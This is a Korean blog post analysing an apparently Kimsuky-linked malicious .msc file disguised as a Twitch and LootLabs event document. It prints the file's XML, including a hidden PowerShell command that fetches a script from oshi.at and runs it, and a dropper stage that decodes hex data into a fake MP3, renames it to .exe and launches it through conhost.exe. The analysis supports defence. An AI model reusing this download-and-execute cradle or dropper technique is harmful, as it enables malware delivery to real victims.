꿈을꾸는 파랑새

오늘은 게임 링크 단축 및 수익 창출 LootLabs 으로 위장한 것으로 추정되며 김수키(Kimsuky) 악성코드 Twitch x Loot Lab Event-2025.msc(2024.9.9) 에 대해 글을 적어보겠습니다.
악성코드 해쉬값
파일명: Twitch x Loot Lab Event-2025.msc
사이즈:141 KB
MD5:41c656c497d7ec24de57a9927c13e81c
SHA-1:4bf38af3605e439d2de62f353c5829c47501c197
SHA-256:5042f64c0c5b1325964279106f0afa330fb2810416043784f5b4deeef0e93aa4
일단 해당 파일은 msc 이지만 해당 코드는 파워셀을 통해서 작동을 하는것을 확인을 할 수가 있습니다.

Twitch x Loot Lab Event - 2025 악성코드 실행
Twitch x Loot Lab Event - 2025 악성코드 실행

악성코드

<ConsoleTaskpads>
    <ConsoleTaskpad List(S)ize="Medium" IsNodeSpecific="true" ReplacesDefaultVi
    ew="tr(u)e" No(R)esults="true" DescriptionsAsText="true" NodeType=
    "{C96401C(E)-0E17-11D3(-)885B-00C04F72C717}" ID="{656F3A6A-1A63-4F(C)4-9C9B
    -4B75AF6DF3A3}">
      <String Name="Name" ID(=)"4"/>
      <String Name="Descripti(o)n" Value=""/>
      <String Name="Tooltip" Va(l)ue=""/>
      <Tasks>
        <Task Type="Command(L)ine" Command="powershell.exe">
          <String Name="Name" (I)D="5"/>
          <String Name="Descripti(o)n" ID="11"/>
          <Symbol>
            <Imag(e) Name="Sma(l)l" BinaryR(e)fIndex="6"/>
            <Image Name="Lar(g)e" BinaryR(e)fIndex="7"/>
          </Sy(m)bol>
          <Comman(d)Line Directory="" WindowSt(a)te="Minimized" Params="-WindowS(
          )yle Hidden -Comm(a)nd iex (iwr (-)Uri 'hxxps://oshi(.)at/PTgX/jIML(.)txt' 
          -UseBa(

Twitch x Loot Lab Event-2025 에 포함된 악성코드
Twitch x Loot Lab Event-2025 에 포함된 악성코드

악성코드 분석

powershell.exe:Windows PowerShell을 실행하는 명령어로 
-WindowStyle Hidden: PowerShell 창을 숨겨서 사용자에게 노출되지 않도록 설정
iex (iwr (-)Uri 'hxxps://oshi(.)at/PTgX/jIML(.)txt' -UseBa(s)icParsing):해당 명령은 원격 서버에 요청을 보내 스크립트를 다운로드하고 이를 즉시 실행(iex)
hxxps://oshi(.)at/PTgX/jIML(.)txt:해당 URL에서 스크립트 파일을 가져오려는 시도 외부에서 악성코드 다운로드

워드 아이콘으로 위장
워드 아이콘으로 위장

아이콘 위장

<VisualAttributes>
    <String Name="ApplicationTitle" ID="10"/>
    <Icon Index="0" File="C:\Progra(m) Files\Microsoft Office\root\Office16\WINWORD(.)EXE">
      <Image Name="Large" BinaryRefInd(e)x="0"/>
      <Image Name="Small" BinaryRefIn(d)ex="1"/>
      <Image Name="Large48x" BinaryRefI(n)dex="2"/>
    </Icon>
  </VisualAttributes>

 

구성 요소 분석

1.<String Name="ApplicationTitle" ID="10"/>:
해당 항목은 애플리케이션의 제목을 정의
여기서는 ID="10만 명시되어 있고 실제 제목 텍스트는 생략
하지만, 애플리케이션이 Word인 것처럼 위장 
2.<Icon Index="0" File="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE">:
해당 부분은 아이콘 속성을 설정
WINWORD(.)EXE 실행 파일에서 아이콘을 불러오고 있으며 이렇게 하면 Microsoft Office 2016 버전의 Word 애플리케이션을 가르치게 돼 있습니다.
Index="0":아이콘의 인덱스를 지정
즉 해당 악성코드는 워드 아이콘으로 위장하는 것이 특징입니다.
즉 다시 돌아와서 해당 악성코드는 실행 시 이동되는 최종 사이트는 다음과 같습니다.
hxxps://oshi(.)at/PTgX/jIML(.)txt
이고 해당 사이트에 브라우저를 통해서 접속을 해보면 다음과 같이 HEX 파일로 돼 있는데 해당 부분이 악성코드이며 해당 악성코드 이름은 RfQK.mp3->RfQK.exe로 변경되는 방식을 사용하고 있습니다.

RfQK.exe 변환및 실행 코드
RfQK.exe 변환및 실행 코드

악성 PowerShell 코드

$data = [byt(e)[]]::new($encode(d)Data.L(e)ngth / 2)
for ($i = 0; $i -lt $data.Le(n)gth(;) $i++) {
    $data[$i] = [Conve(r)t]::ToBy(t)e($encodedData(.)Substring($i * 2, 2), 16)
}

$(m)p3Path = [Sys(t)em.IO.Path]::Combine([System(.)Environment]::GetFo(l)derPath
('CommonD(o)cuments'), 'RfQK.mp3')
[System(.)IO.File]::Write(A)llBytes($mp3Path, $data)

$exePath = $mp3Path -replace '\.mp3$', '.exe'
Rename-Item -Path $mp3Path (-)NewName $exePath

Start-Process -FilePath 'conhost(.)exe' -Argument(L)ist $exePath -NoNewWindow

코드 분석

CyberChef Frome Hex
CyberChef Frome Hex

1.데이터 디코딩:
여기서 $encodedData는 HEX 인코딩된 데이터
해당 부분에서는 16진수 형식의 문자열을 바이트 배열로 변환
Substring을 사용하여 2자리씩 잘라서 16진수 값을 바이트로 변환하고, 이를 $data라는 바이트 배열에 저장
결과적으로 $data는 바이너리 파일의 데이터를 나타내고 있음
2. MP3 파일 생성:해당 부분은 변환된 바이트 데이터를 사용해 MP3 파일 형식으로 저장하는 동작을 수행
CommonDocuments 폴더는 모든 사용자에게 공통으로 접근 가능한 문서 폴더이며 이곳에 RfQK(.)mp3 파일을 생성
실제로는 MP3 파일이 아니고 악성 코드를 담는 실행 파일의 데이터
3. 파일 확장자 변경: 생성된 MP3 파일의 확장자를 .exe로 변경하며 실제로 실행 가능한 파일로 전환
4. 프로세스 실행:
conhost.exe이라는 시스템 프로그램을 실행하는 것처럼 보이지만 실제로는 그 파일에 인자로 악성 코드가 포함된 .exe 파일을 전달해 실행
-NoNewWindow 옵션을 사용하여 실행 창을 숨기고 백그라운드에서 악성 코드를 실행하도록 명령을 하고 있습니다.
악성 행동:
인코딩된 실행 파일 생성: 스크립트는 인코딩된 데이터를 바이너리로 변환해 악성 실행 파일을 시스템에 저장
확장자 변경을 통한 우회: 초기에는 MP3 파일처럼 보이게 한 후 확장자를. exe로 변경하여 실행 파일로 만듦
백그라운드에서 실행:conhost.exe를 이용해 백그라운드에서 파일을 실행하여 사용자가 눈치 채지 못하게 하는 것이 특징
해당 악성코드를 탐지하는 보안 업체들은 다음과 같습니다.
CyRadar: Malicious
ESTsecurity:Malicious
Forcepoint ThreatSeeker:Malicious
SOCRadar:Malicious
ESET:Suspicious

기본적으로 보안 수칙을 잘 지키며 AV-TEST에서 좋은 성적을 받은 보안 업체를 사용하는 것을 추천합니다.

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band